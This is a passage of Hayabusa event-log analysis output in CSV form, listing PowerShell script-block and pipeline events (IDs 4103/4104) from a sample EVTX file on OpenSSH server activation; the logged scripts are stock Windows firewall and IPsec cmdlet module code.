'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if 
($PSBoundParameters.ContainsKey('InputObject'))",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"{ foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecMainModeRule' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"{ foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP 
NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecMainModeRule' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.216 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.216 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.216 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.217 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.220 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.221 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; 
value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.221 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.221 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.222 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 
19:19:38.250 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetAddressFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] 
[ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is 
[System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallAddressFilter' -Alias '*' function Set-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LocalIP')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('RemoteIP')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] 
${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, 
$__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallAddressFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.250 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetAddressFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { 
$__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] 
[ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallAddressFilter' -Alias '*' function Set-NetFirewallAddressFilter { 